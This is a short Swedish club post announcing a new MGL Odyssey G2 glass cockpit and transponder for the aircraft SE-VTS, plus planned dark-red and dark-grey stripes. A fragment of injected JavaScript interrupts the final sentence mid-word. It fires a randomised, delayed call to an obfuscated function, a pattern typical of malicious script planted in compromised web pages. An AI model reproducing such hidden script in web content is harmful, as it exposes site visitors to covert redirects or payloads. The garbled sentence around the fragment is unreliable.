Digitala instrument och stripes på SE-VTS

Instal­la­tion av helt ny digi­tal instru­men­te­ring (“glass cock­pit”) kom­mer att ske under vin­tern. Detta inne­fat­tar även trans­pon­der för distans­flyg­ning eller flyg­ning inom kon­trol­le­rat luft­rum. Instru­ment­pa­ne­len är av model­len Odys­sey G2 från MGL Avionics.

Inför nästa flyg­sä­song pla­ne­rar vi att även appli­cera dekorstri­pes på flyg­pla­net enligt samma möns­ter som på SE-VSL, fast i andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andra fär­ger: mörk­rött och mörkgrått.